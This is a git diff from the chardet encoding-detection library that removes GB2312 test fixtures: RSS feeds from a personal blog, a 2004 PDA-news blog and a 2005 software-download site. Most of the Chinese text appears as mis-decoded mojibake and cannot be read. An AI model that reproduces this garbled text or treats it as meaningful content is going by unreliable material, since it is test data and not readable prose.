    ׂ®ֲ³´ףׁ§³צ°זֹח׀ֲ³צ¹±²¼ְןֿ£¡¶ְ½ח׀¡·¡·£¬ֱם¹÷µֳ׃¢¹תָֻּ״ְן·ֱׂ¸ס¶¶׀ֲײר£¬÷®¼¿´¡£ַ°¼¸ּל£¬´ף־ְ·²¼ְ־¬ֶז½²¿־µִ±÷עֽ»ָ»¿´ּל»¨°ו‎·ײײ׃£¬ָ»÷ףֻµ£¬¡°¶א־°´ףµִׂ»׳«°¡¡±¡£ַֻׂ»¸צ÷÷ֳµִֵתְֶ¼ׂ£¬ֿ£ֽׂװ÷ף׃׀±¼ה½יֹׂ»ֲֻֿµִ¶«־ק¡£

    ¿µֻׂ½ַּ°¼¸ּל´קֱֻׂ»¸צֶזּ״µִ׀״ױכ£¬ֳֹֿז¾׃ָ»ֿגַ¶׳ֵׂ»¸צ׀¡׀¡µִµדָ¾ֹ½ֻ®µִֶ¿׳׃£¬ ־ׂ¸זֻֻ‎־ׂ´׃ְ´ֳ»¼¹‎ױגׁשµִ¶«־ק£¬ֻ‎ֻµֻ‎ׂװַ°ׂ²ֳ»¼¹‎£¬ױגִַ²¸´ְס½ּµִּ«ּ«ַ׳ײ (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    DH http://www.blogcn.com/User3/luciferwang/blog/26740853.html
    ¸׀µ½ײ®÷ף£¬ֻש׃׀µִ¶«־ק¶¼»ב²»ׂ»ׁש¡£

    ־ׂׂװַ°¾ֽ²»½¹ֲַ£¬־ׂװח¾ַֽ½ג·ֱֵֻµִ°®ְצ¶£¬ֿײװ¿´µִ¸¿×ֱֻ¡£

    ׂגׂו±¾ֹם¾ַֽ־ׂײְןµִׂ»±­ֻ®¡£־ׂ²»׀טׂ×׀´ּ«¶א׳ײ£¬ָח¹ֳַֻװ¸ׂג£¬¾ְֽ´¸ת־ֻׂ²¼הִ¦²ֱ£¬ָ»÷ף°®װץׁשװץׁש¡£

    ױגׂ»ַ׀¶¼ׂ׸׀׀»DH£¬ֳ»׃׀ִד£¬־ׂ¾ֽ»בׂ»ׁװ²»·¢¡£ (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ױזְֳ°¡ http://www.blogcn.com/User3/luciferwang/blog/26648485.html ׳¼±¸¶א׳ׂ»׀©µ״·½£¬÷ֽ׃׀ָ₪µִֵף׃ׁׂ»ֶנ÷ָ÷ָ²ט¡£

    °®ֹס¶װ־ׂµװַּ«÷ֱֳֻ¡£

    ¶­»×


    ־ׂ÷ֽֽךְֳµִָֻ£¬¿ִ¿ִֵצֵצ³צµִׂפְײ
    ¾ֽֿסֻ¯¾ָֻµִק‎ֹשְן£¬¶¶¶¯µִװ¿³׳ֱ´
    ִַֹֻ³µִֶ₪·פ£¬׃׀ֹ½׃׀װֶµִ£¬ֳ»׃׀¹ֲµִ
    ֲּµִ´ֵ³¡£¬÷¬׳ֵ׀¡ְ¼»¨¾חֵֽµִםְ£¬ֽךְֳµִָֻ
    ½¿´ַׂ»¿י»¨ֶװֲנ£¿־ׂ׳×ֹםװק‎ֹשײ׀£¬¿´µ½ּד׳׃ֵָָµִ
    °ף¼ױׂ²ַ³ײµ¶µִ»­¼ׂ£¬ִַ²»ױ‎ַ׳¼±¸ֻ÷ֶ±
    ׀´ַי«µִ־ֲׂנ£¿ֽךְֳ¿ֹ·ס׳צׂ»°ֽׁ¨ֿעֽעִµִװ¿³׳
    ־ׂµ²¿×±םַי¾ר¶װµֱִנֱ§ֳ¨£¬ֻµִׁ¾¦ֳָ־ֹׂתֲֵ«ײ׀
    ¸ֽךְֳµִ־ׂ£¬ׂ²ַ־ׂµִַיµ׀£¬ָ«¸±־ה׳°ָח°ז»­ְן
    ׀ְׁ´µִ¾ָֻ£¬ֻµ°ז»­¼ׂׂ²»ב־ֲָבֲנ£¿־ֳַׂײ×µְ׀י»ְֳ½חµִ
    װ´ָ×ַ»¨¶הֹֿ¿ױ£¬ׂ°ֲםµִֶרֿ¢£¬ַבַבµ״¸¡ֶנ£¬´÷ׂ¹ְן
    ֳ¼ִ¿ָח»­µִ׀¡±×£¬ֻ‎¾ץµְֳ½חֹֿµֲִ£¬ַ¿ֹ׃׀¿ֹ־µִײ×¶
    ָח±¶רֿ§µִ£¬¾ְְֳָֻצµִ²ׂפ£¬ֻשׂװֽךױ¡£


    2005





    ֵב÷½


    ֶז¼£´ר־ָׂ¥ֲֳ׀׀£¬׳מ³ץ
    ־ׂµֳֿס»ב׳ֲ·µִ·חף£¬ְ½ח±״׀כַד׀±
    ׂ°ׂ²װ´¹ְב£¬µ½´¦ַ¹עµ״¿ַףµִ
    ·חײ׀ײ®»¨£¬ֵ¼¶ֶֶּי־×׀¦£¬װֲֲֿׁ‎ז¬µֳִ¨׀
    ּב¾׳ֵ־ֳַׂ£¬ַָֻ¶אֳ´ְֻµִ׀¡¶¯־ן£¬־ׂ£¬µµ¹ױ
    ±³°ְןַָ‎®ֻךµִײ׀ֹ½ְַ£¬ׁ§ֹֿ»עױֻµ£¬ׁ°ַף (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    29ֻך http://www.blogcn.com/User3/luciferwang/blog/26591228.html

    (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ־ׂµִֵ¼ֿס http://www.blogcn.com/User3/luciferwang/blog/26568017.html

    ¾ַֻֽ‎¡£

    (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    °²¾²ֻ¼¿¼ http://www.blogcn.com/User3/luciferwang/blog/26408868.html
    ױגׂ»ִךְ´׀ֹםֱ¶׀־£¬ֿײװ£¬־ׂµִֹםּוְֳ¼«ֱֻ£¬¸׀¾ץ¸ת¶‏®ֻךµִ±÷עׂ»ׁש£¬µ«ַ¸¼׃ַ¿ָֽ¡£


    ־ׂ׳רװׂ»¸צֶזֳמµְִ½חֹֿ£¬ַ»כָ»µִ·¢¹גּו£¬װ־ֿײ׀£¬»׃³צ÷ֶו«¡£ (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ְ½חֹֿ׳מְֳµִ׀ֱִי http://www.blogcn.com/User3/luciferwang/blog/26321657.html


    (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ּבַ°»״ְ´ http://www.blogcn.com/User3/luciferwang/blog/26143344.html
    ־ֿׂײװֿכµֲִַי¾ַֽ£¬12װֲ»״±±¾©׳¡׳ֵ£¬÷ֽ־ׂ°®µִָֻװׂ»ֶנ£¬ּלּל״ֻ״£¬ֶהֻµִ²ֳ´¶¼²»ֿכ¡£־ׂ¾ֽֿכ÷ֻֽ‎ֳ¿ּלׂ»ֶנ׳ר׳ֵ£¬¿´׳ֵ¶װ·½׀¦¡£³צָ¥׳ֲ·µִ±÷ע£¬ֻ¯¾ץµִ±÷ע¶¼ְ­׳ֵײ£¬ֽםֹֿ±§׳ֵֻµ»°£¬ֲ‎ֲ‎ֻ¯׳ֵ£¬ָח¹°כׂ¹¶¼׀ֱֻׁ£¬¾ֽ³₪¾ֳµ״½׃־ַ¡£

    ¾ַֽױגׁש¡£ (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ׀´ֲ־ִ http://www.blogcn.com/User3/luciferwang/blog/25568779.html
    ¹ְִרׁ§ץ½»ֱק£¬µ«²»ׂ×װ´ֻµ״ֱפׁװ¡£







    ׀´«£÷

    ־ׂׂ×׳צֵ׳ֵµְֵµִ»ּ״ֲ£¬±»°®ֹסֻש°®µִ¿¨ֲ¶£¬ׁ׳אׂפְײµִ²¼ְ³¿ֻ¡£½«ְ´µִ«£¬ׂ×׀´¿´²»¼µִ¶«־ק£¬¸תֳַֻµִַ׳ֳ¾ַֽ¸תֿ£ֽµִַ׳ֳ£¬׃ןׁװ½«½רָכֿ£ֽµֱִלµ״£¬ֳַֻפ׃־´ְ´µִַדּ‎ױ¡£




    ־ֿׂס¿ױֶרׂ»ׁשְכָ¥£¬־ֿׂע±¼ֵµִׁפ¹גֻ¦¶¯־ׂµִ°׳·¢£¬
    ־ֳָׂ־ׂµִׁ×ָג׃¿½רהצ־׀£¬ֳָֻװ»¨±µִ³ֲײײ׀ֶ¯ֱק¡£

    ־ׂ°ׁ׳װ¼÷ֱפ¸רֱֽµ״£¬׃ײ´׃ֻµֲִּ²ײ׀ֹת³צ
    ָח¹ִדװׂ»´־׀טׂ×־ׂ£¬װִדµִׁ¥µ׳ױׂ־ׂ°ֹ¡£

    ִד÷ִׁײ×µְ־ַֻׂ­£¬»ע־ׂµִׂגֻ¼ַ²ֳ´£¬
    µ«ַ£¬־ֲװץׁש£¬־ׂ½«׃׀ײת׃ִדµִ½¡¿µ£¬
    ¹‎ֲֻ²¢¼׃ַ¿ִדµִׁ×ׂ÷¡£

    ¿×¼±ָ¡²»µ½־ׂ£¬²»ׂ×»ׂ׀ִ£¬
    װׂ»´¦ױׂ²»µ½־ׂ£¬װָ¥±נ´¦£¬
    ־ֽׂ£ֱפ (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ׀ֲ־ִ¾ http://www.blogcn.com/User3/luciferwang/blog/25528157.html
    »»ֱֻ׀ֲּ¨µֶ£¬ֲעֱֻ60ײ§±£¬»¹׃׀÷ֳ¿´µִ±¾׳׃¡£¸ת־ׂׂ»ֶנֹת»מ¹‎µִָֻ¶¼ײ×µְ£¬־ֿׂ²»¶¸קײײ׀¡±¾׳׃£¬ָח¹ֻ­ׂ×ֻֽ־ְׂס־ן£¬²»ׂ×ֻֽי£¬ׂע־×׃׀¿ִֹ־ׂ¿´¹‎£¬׃׀¿ֳִֹ»±¼ה¿´£¬µ«׀¡±¾׳׃¶¼ַֿ²»¶µִ¡£

    µ½ְֳ¹ת־וִך£¬־ׂ׀´µִ׳מ¶אµִ¾ַֽ¸קײײֲ־ִ£¬־ִׁ§µִ£¬ְת·µִ£¬ְָֻאׁ§µִ£¬ֹח»בׁ§µִ£¬¸קײײ¸קׁשµִ£¬װְֳ¹תµִׁ§׀£ְן¶ֱ־ִ¿ֶ²©¿£¬׀´ֲ־ִ»בױ¼¾´ף²¿·ײ±¼ה¡£׀´«£¬¶װ־ְׂ´ֻµ£¬ׂ»°ד¶¼ַ׀´ֲ־ִֶ¼ה£¬׀ֿ¢µִ±÷עֻזײׂ»»׃¶ר¾ֽ¡£


    ׀¡ְֳָֻ¶שK׳מ½װ±±´ף¿¼װ£¬¸תײ׀־ְִֿ¦ֳַּבֱֻֽץµְ¿£¬½ב¹µ½׃ֵ´‎£¬¹‎¹״ײ®÷ףְײµְֳ´ױׂ־ְׂ´ֻµ¡£ֻ‎·ַ³£ײ®¹װַֹ£¬¼־ׂµׂ»ֳז¾ֻֽµױׂµ½׳יײ¯ֱֻ¡£µ±ִך־ׂ¿´ֻ‎ֹסַי¾ײ¹·ַ³£ֿסײ»ֿדׁ׀¡ֳ¨£¬ׂ»¸׀ֻ¾ֽ¸רֻ‎׳צֱֻׂ»ּץ´ף׃ד£¬ָ»÷ף¿´׳ֵֻ‎³װ¡£

    ֿײװֻ‎װ¼ְׂן׳װ¼÷ײֶ׳קֿדװםֽז£¬־ׂׂ²¶©׳צֱֻׂ»¿י¡£

    ־ּׂלּל׀´ֲ־ִ£¬׀´µ½12װֲ£¬´ף¼ׂׂ»ֶנֽז¡£


    ¶‏

    ¹״׃׃ָ¿¨ּ¹µְִ׳±©

    װ׃ָ¿¨ּ¹£¬¼׃ְױ±ָװ²׀־¾÷¼¼³¡µִ
    ֲךֵׁµִ®ִֻ׀׀«ֳַָֻ£¬²»¹ֻ׃¥צְ£¬ֲֹּ«¾׳לִס
    ÷ְֽ¶ֹ«ֹֻׁ»£¬ָװָ»¶װ׳ֵׂ¹ִס³×³צַי¸ט£¬
    ·ֲ·נ¸¾׃װ³ָֹ«¿ױֶרײ׀µִ£¬
    ׳״יµקֹֿ׳ֿ÷לµִִֶָֹּ¸ֳַ£¬¶¼ּ«ׂ°ֲש¡£
    ¿ַֹ£¬¿ְֻןֻ¹±צׁׂ¾­ׂ»־ֻש׃׀£¬
    ´׃ָ־÷־ׁ°³£µְְםײ׀£¬¶¼²»ײ¸ֽµֳµ½ (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    °כָױֿ׀ http://www.blogcn.com/User3/luciferwang/blog/25452215.html
    ׂ»ֱק«ָֻ׀´µִ«£¬¼ִַָ¹»ִָֹ·ב¸»ׂגׂוµִ׀´ַ׃ְ¶¯»ת£¬׃ײַ׀´¸רחֻׁ¹ֵ®ֹסµִַיי¡£ֻµ°׳ֱֻ¾ַֻֽש־½µִ¡°«¾ַֽׂ»׳«µִײקּג¡±£¬׀´«׀´µִ¾ַֽ׀´ױג׀©¾ה׳׃µִ±÷ע¶װױג׀©¾ה׳׃±¾ֹםµִ¸׀£¬ֻשׂװ׀־½ֹֿ»ב»כָ»ּל³ֹ£¬÷ֱ·¢־ֻ¬¡£µ«²»ַ²ֳ´±÷ע¶¼ִ׳צµ½ױגׂ»µד£¬ׂע־×ֱל־עֱֻױגׂ»µד£¬ָח¹ֽ£ְֲֿ´£¬ֱל־ע¾ֽ»ב½©»¯³ֹ¹ִמ£¬ױ‎ָ·µִ¹ִמ÷ֶֽ«¼ׂ»ׁש׀טׂ×ֶֶ³‎¡£ֻשׂװ־ׂ׀´ׂ»¶־±¼ה¾ֽ׀×ֱֻ£¬
    ָ»÷ף´׃»ש±¾µִ׳ײװ¿×¼£¬ֲֲִִֵ‎ׂ»µד£¬µ«¿ֿ¶¨²»ִַ£·ֲײ®׳ק¡£

    ־ׂ´׃ׂ»¿×¼¾ַֽ¸צֿאµ±±£״µִ«ָֻ£¬ֹץײֱֻµַ½קֹק¹‎¶ֱָֻ¡£ִ³׀©ָֻֻµ־ׂײ»»ב³ֱִח׃׀‏ֿכ£¬ֶהµױגַַ«׀י÷ֽ²»׳ֵ¼±µִ±םֿײ¡£÷¶א³£¼ְא׀ֽµִ«£¬־ׂװץֳ´¿ִֹ²»»ב׀´ִ״¡£

    ׂ»¸צ«ָֻׂ×±£»₪׳װ¼÷½¨ֱ¢µִ«¸ט¿ױ¼ה£¬²»ִַבׂ׳¾ֽ¸ֵָֹ£¬»¨±¼ה׳°׀ִ²¿½ב¹¹ַ¾ר¶װ±״ׂ×µִ£¬ָח¹ׂ׿׷ֵ£¬ִַׂ²²»ֳַָװ׃ײֻז±ד½רְ´£¬¶רַ׃׀¾«ָ·ײֶµ¼µ״³צָ¥ײ³ֳס£¬¶רַׂׂ×׃׀־ִ»¯ֹֿµִ׃׀»מֱ¦µִ׳װ´׳ק÷ף¶£¬²ֵ»בװ׀ֲµֱִל׃עְן׀´³צױ¾µֳ׳¡µִ·ח¸ס¡£

    ׀´«¸תּ¸ֱµ°®ׂ»ׁש£¬ׂ×ֽ¶ָכ£¬µ«ׂ²ׂ×´ף¶ָ¡£

    ¾ַֽױגׁש¡£


    (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    \ No newline at end of file diff --git a/chardet/tests/GB2312/pda.blogsome.com.xml b/chardet/tests/GB2312/pda.blogsome.com.xml deleted file mode 100644 index 6058418..0000000 --- a/chardet/tests/GB2312/pda.blogsome.com.xml +++ /dev/null @@ -1,112 +0,0 @@ - - - - - My live,My Pda - http://pda.blogsome.com - ֱפֲֿ־ֳַׂ׳מױזµִ»״ׂה - Wed, 29 Dec 2004 12:39:33 +0000 - http://backend.userland.com/rss092 - en - - - ²¢־´¾ר־¿ִֹ£÷²ֹ׃ֳ·ַPalm²׳קֿµֽ³µִPalm - װ₪ײֳLinux£¬»עױַSymbian£¬ֹץײֱַWindows CEµִPalm£¬ּ‎ֶנְ´׃׀׀©²»¿ֹֻ¼ׂי£¬µ«ַױגָ·µ׃׀³צֿײµִ¿ִֹ£÷PalmOneµִ¸÷װנָֻװרװִך³ץ¾ֽֽ¸ֲ¶¹‎Palm²תֶ·²ֹ׃ֳֶהֻ²׳קֿµֽ³µִֹטֿכ£¬±¾ײֳַֻµִCEOװ´־¾ֽױגׂ»ֹטֿכ¸ר³צֱֻ´נ°¸¡£ - PalmOneµִCEO¼ז׳²ֳTodd Bradleyַװׂ»´־µח»°»בׂיײ׀¾ֽPalmOne½«»בֶֽ³צׂ»¿מ²ֹ׃ֳPPC²׳קֿµֽ³Tero 600µִ´«ׁװַ·ספµ׳צ³צ´נ¸´µִ£¬ֻ±ם¾£÷²»ֽ¬µִ²׳קֿµֽ³½«»ב־×ֶהִ¿±ך¿ֽ»§׃ֵ»¯²תֶ·£¬PalmOne²¢־´׀²¼¹‎ֶֽ³צ»ש׃־¢ָם²׳קֿµֽ³µִ²תֶ·£¬µ«ַ²¢²»ֵֵ³‎ױגײײ¿ִֹ׀װ£¬°ְ¨Symbian¡¢Linux÷ֶֽהֻ²׳קֿµֽ³¶¼׃׀»ת»ב¡£ - ײµµֳ¹״׳¢µִַ£¬־¢ָם·½ֳזװµֳײ×ױגׂ»ֿֿ¢÷ף£¬ֱ¢¼´±ם¾³צ׃כPalmOne÷ֿ׳קµִ»‎¼«ּ¬¶ָ - - - http://pda.blogsome.com/2004/12/29/cioitheaueoacpalmuiuiuapalm/ - - - - Sandiskִ¿ַ°¼ֶ»®ֶֽ³צׂ»ײײ׀ֲµִSD´ז´¢¿¨²תֶ·£¬¸ֳ²תֶ·¼¯÷ֱֻֿ´ז´¢ׂװ¼°Wi-fiִ£¿י¡£ - -ױג¸צ²תֶ·׃׀±״ׂ×ֲנ£¬ִ¿ַ°׀ֳזֹֿµִ÷¶א׀¡²תֶ·ײ»׃׀1¸צSD¿¨²ו²£¬׃µ׃׀ׂ»¿י¼¯÷ֱֻֿ´ז´¢ׂװ¼°WLANµִSD¿¨£¬׃ֳ»§¾ֽ²»½צ½צִַ¹»´ז´¢‎¾£¬»¹ִ¹»ֳָ׳װ¼÷µִPDAׂ²ֱֹֻֿֿ¡£ - Sandisk¹«ֻ¾ִ¿ַ°ױ‎װµָ´‎־¢ָם¹«ֻ¾ֶֽ³צײ§³ײֻ«ִ£½SD¿¨µִWindows Mobile 2003¸׀ֲ³ּ׀ע£¬Sandisk»ש׃Wi-fiµִSDIO¿¨256MBֱָ¿װ₪¼ֶ¼װ¼װ150ְֳװ× - - - http://pda.blogsome.com/2004/12/29// - - - ֶהµ°³ׂ²ֿכׂ׸צTC - - - - http://pda.blogsome.com/2004/12/29/aeaeuoieootc/ - - - ֻקִב£÷ֶֽ³צ³µװ״3Dµ¼÷½ֹט±¸ - ֻקִבװ½ָױֶֽ³צָ‎¿מ³µװ״µ¼÷½¡¢׀ֵֿ¢ֹט±¸NV-XYZ 33¡¢55÷ֽ77£¬¾ש²ֹ׃ֳLinux²׳קֿµֽ³£¨2.4°זִ÷ֻ£©£¬´ר׃׀׃²ֵּ£¬¿ֹ׃כPCֱ¬½׃£¬ּב¹©3Dµ״ֽ¼µ¼÷½¡¢¶אֳ½ּו²¿·ײ¡¢GPSµָ¹¦ִ¡£ - - - - - http://pda.blogsome.com/2004/12/29/eaaiaeouoo3duee/ - - - AMD£÷׀ֲ¿מױֶֹֿµחִװֿײֹם - AMDװ½ָױױ¹¾ֱֳַֻֻ׀ֲ¿מױֶֹֿµחִװ²תֶ·£¬¸ֳ²תֶ·²ֹ׃ֱֳֻAMD׳װ¼÷µִAlchemy AU1100´¦ְםֶק£¬¹₪׳קֶµֲ400Mhz£¬µ«׳מ´ף¹¦÷ִ½צ׃׀250mW¡£ - -AU1100´¦ְםֶקײ§³ײMIPS32²׳קֿµֽ³£¬¶רױג¿מױֶֹֿµחִװ´ר׃׀ׂ÷¾§ֱֶ£¬ֵה׃׀ִ´ז÷ֽUSB¿״ײֶֶק¡£ױגׂ²ַAMDױ¹¾µִ׀ֲׂ»´ת¹₪³ּׁשֶ·£¬²תֶ·ױ‎½·¢²¼±¼הֹ׀־´ָ·¶¨¡£ -=========== -¾ַֽ²»ײ×µְָם¼‏ײ§³ײµִװץֳ´ׁשֱֻ¡£ - - - http://pda.blogsome.com/2004/12/29/amddhaioaeeiucaoioei/ - - - CFµִUSB׳×»»½׃¿ - -ױגַRATOCֶֽ³צµִ²ֹ׃ֳCF Type II¿¨µֿײµִUSBֵהֶקCFU1U£¬׃׀ֱֻױגײײ׳°ײֳ£¬ײ»ׂ×ֵַה±¸CF Type IIµִPalm¡¢PPCׂװ¼°ֶהֻײ³ײֹט±¸¶¼¿ֹ¹׃ֳUSB½׃¿½ר׀׀ֽג½׃ְ©ױ¹£¬²»¹‎CFU1Uµִ¼¸´ן139ְֳ½נ£¬¿´ְ´ׂ²²»ּ«¿ִֹ³ֹ־×ַמָֻ·¢ֹױ׃ׁµִֽז¾ֱֻ - - - http://pda.blogsome.com/2004/12/29/cfuausbou/ - - - TE÷ֲֳנ£¿±¾ְ´ֿכֲעְ´£¬׳מ÷ף»¹ַ1940 - -³´ח 115x78x12mm -ײ״ֱ¿ 131g -²׳קֿµֽ³ Palm OS 5.2.1 -´¦ְםֶק TI OMAP311 126MHz -ִ´ז 32MB(28.8MB׃ֳ»§¿ֹ׃ֳ) -µח³״ 840mAh -²־¿¼¼¸ס 1850 - - - http://pda.blogsome.com/2004/12/29/teaadhaieaoaioec1940/ - - - ָ«ַע׳מ׀¡µֳִ₪ָֻ׳¨׃ֳױֶֹֿµחִװ - ׂ»¿מ׳¨־×ֳ₪ָֻ׃ֳ»§ֹט¼ֶµִױֶֹֿµחִװ׳מ½ֱֱֿא£¬ױגׂ²ַָ«ַע׳מ׀¡µֳִ₪ָֻPDA¡£ - -ױג¿מֳ־×BrailleNote PK»תֹם³´ח174x92x32mm£¬ײ״װ¼450g£¬׃כֶױֽ¨ױֶֹֿµחִװ׳מ´ףµִַר±נ¾ַָֽ¡ֿֿװ¾ֱִֶ»£¬¶ר¸ִׂװ²¼ְ³ׂ¶ֳ₪־ִ·÷ֵּז´ת£¬²¢ִַׂײֳ׃ןׂפ÷ֿ³ֹ׀¾ֶ¬£¬ׂװ±ד°ןײת׃ֳ»§¹׃ֳ¡£׃²¼‏·½ֳז£¬BrailleNote PK²ֹ׃ֳWindows CE²׳קֿµֽ³£¬ֵה±¸16MBִ´ז£¬ײ§³ײְ¶ְׁ£¬²¢ִַׂײֳֽרֲח¶ֻ¿£¬½«׃½סִךµִֻ¼¾¶ָֹֿ׀¡£ - - - http://pda.blogsome.com/2004/12/29/ecoidhuaaeeoaoaeeiucao/ - - - ־ׂµִ°®»ת1940 - -¹‏¹‏ - - - http://pda.blogsome.com/2004/12/29/iouau1940/ - - - E-Ten·¢²¼׀ֲ¿מײ»תM500 - -׳מ½£¬ּ¨ֽוׂ»¼ֳׂ־×E-Tenµִ¹«ֻ¾·¢²¼ֱֶֻה׳מ׀ֲ¿מµִײִַײ»תM500¡£ - ¡¡ - ׀ֲ¿מײ»ת²ֹ׃ֱֳֻWindows Mobile 2003SE²׳קֿµֽ³£¬ִ½¨ֱֻ400MHz Samsung S3C2440 CPU£¬128MB RAM÷ֽ64MB ROM£¬ֿװ¾ֱִֶ»־×2.8׃¢´חQVGAׂ÷¾§ֿװ¾ֱִֶ»(240x320),²¢ִ½¨ְֱֻ¶ְׁ÷ֽ130ֽעֿסֻ״µִֹדֿסֽ·£¬׳מּ״±נֶַה»¹ּב¹©ׂ»¸צUSB½׃¿£¬·½±ד׃ֳ»§½׃²´¸¶אµִֹט±¸¡£ - M500µִױ»ת³´ח־×111.7x60.7x22mm ,ױ»תµִײ״ֱ¿־×170g£¬ִ½¨µִ1440mAhן®µח³״ִײ§³ײ4¸צ׀¡±µֱִ¬׀רֽ¨»°±¼ה¶ר´ףװ¼200׀¡±µִ´‎»ת±¼ה¡£ - - - http://pda.blogsome.com/2004/12/29/e-tencdhaieoum500/ - - - diff --git a/chardet/tests/GB2312/softsea.net.xml b/chardet/tests/GB2312/softsea.net.xml deleted file mode 100644 index 093d169..0000000 --- a/chardet/tests/GB2312/softsea.net.xml +++ /dev/null @@ -1,915 +0,0 @@ - - - - -ֿµֽ³¹₪¾ -http://www.softsea.net/cat/3.htm -ּב¹©׳מ׀ֲ[ֿµֽ³¹₪¾]ֳג·ֲֿׁװ״ -Thu, 29 Dec 2005 17:37:19 GMT -SoftSea.net -http://blogs.law.harvard.edu/tech/rss - -Trojan Remover 6.4.5 Date 12.28 -http://www.softsea.net/soft/136695.htm - -<img src="http://www.softsea.net/shot1/136695.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ַׂ»¸צ׳¨ֳֵ׃ְֳ´ַו³‎ּ״ֲוֱִׂ¾ֲם÷ֽ׳װ¶¯׀¸´ֿµֽ³־ִ¼‏µִ¹₪¾¡£ִ¹»¼ל²יֿµֽ³µֲַ¼־ִ¼‏¡¢ֹ¨ֳטWIN.INI¡¢SYSTEM.INI÷ֽֿµֽ³µֲַ¼־ִ¼‏£¬ַֹׂ¨ֳטֽך³ֹ÷ף»ב²תֹתLog׀ֵֿ¢־ִ¼‏£¬²¢°ןִד׳װ¶¯ַו³‎ּ״ֲוֱִׂ¾ֲם÷ֽ׀¸´ֿµֽ³־ִ¼‏¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31190.htm">ִ¾ֲם¼ל²ג</a>] - -http://www.softsea.net/soft/136695.htm -Wed, 28 Dec 2005 16:00:00 GMT - - -Magic ISO Maker 5.1 Build 184 -http://www.softsea.net/soft/126085.htm - -<img src="http://www.softsea.net/shot1/126085.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;Magic ISO Maker ַׂ»¸צ¹¦ִ·ַ³£ַ¿´ף¶רַׂ·ַ³£ָׂ׳¹׃ֳµִCD/DVD¾µֿס־ִ¼‏±א¼­¹₪¾,³ּ׀ע¿ֹׂװ°ןײתִד¿לֻµִ´´½¨,±א¼­,ֽ·ֵISO¹גֵּ¾µֿס־ִ¼‏,¿ֹׂװ°ןײתִד½«¹גֵּ»עױ׃²ֳֵֹּֿזµִ־ִ¼‏ײ±½׃ײֶ׳ק־×ISO¹גֵּ¾µֿס־ִ¼‏,¿ֹײ±½׃´´½¨¿ֹׂ‎µ¼ֿµֽ³µִ¹גֵּ¾µֿס־ִ¼‏,ײ§³ײֻש׃׀ׁׂײ×µִ¹גֵּ¾µֿס־ִ¼‏¸ס½,¿ֹׂװ<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/301.htm">µ׃ֳ¹₪¾</a> > <a href="http://www.softsea.net/cat/30104.htm">¹גַ‎¹₪¾</a>] - -http://www.softsea.net/soft/126085.htm -Wed, 28 Dec 2005 16:00:00 GMT - - -Cheetah CD Burner 3.35 -http://www.softsea.net/soft/125575.htm - -<img src="http://www.softsea.net/shot1/125575.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ױג¸צ³ּ׀עּב¹©ׂ»¸צ½חֳז׃ֳ׃ֹױׂפֶµ׀ֵ÷ֵ÷ֽ‎¾ CD¡£ױגׂ²°ְ¨ֱִ¦ֹױ÷ֽ׳צ³צֽ¬־ִ¼‏¡£±»ּב¸ּ״ױק°ְ¨¶װִדµִֿ²°®µִ־ִ¼‏¼׀÷ֽ׃ֳ׃²י¿´ֿאֶ¬ֿףֻץֲװֽ¼ִַׁשµִ²»ֽ¬µִ־ִ¼‏·ח¾°ֹטײֳµִ¿ל½·½½¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/301.htm">µ׃ֳ¹₪¾</a> > <a href="http://www.softsea.net/cat/30104.htm">¹גַ‎¹₪¾</a>] - -http://www.softsea.net/soft/125575.htm -Wed, 28 Dec 2005 16:00:00 GMT - - -AntiVir Personal Edition 6.33.00.78 -http://www.softsea.net/soft/110606.htm - -<img src="http://www.softsea.net/shot1/110606.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ָח½ס²¡¶¾÷ב׀׀ּלֲֿ£¬·ְ¶¾ָם¼‏ֳַ¿ּ¨»תֶק¶¼±״²»¿ֹֹµִ£¬ָח¹ִד²»׀¼׃׃ֳµֱ°זµִ»°£¬AntiVirַ¸צ÷²»´םµִׁ¡װסֵ¶¡£AntiVirµִ¿ֹ¿¿׀װַ¾­¹‎¶א´־¶װ±ָװׁי÷ֽ¶ְֱ¢µִֹּׂµ¼ֲֽ¼ײ₪ֳקֱֻµִ¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31191.htm">ֶהָֻם¼‏</a>] - -http://www.softsea.net/soft/110606.htm -Wed, 28 Dec 2005 16:00:00 GMT - - -F-Secure Anti-Virus ²¡¶¾ֲכ 2005.12.28 Build 1454 -http://www.softsea.net/soft/110556.htm - -<img src="http://www.softsea.net/shot1/110556.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;F-Secure Anti-Virus ²¡¶¾ֲכ<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31121.htm">F-Secure</a>] - -http://www.softsea.net/soft/110556.htm -Wed, 28 Dec 2005 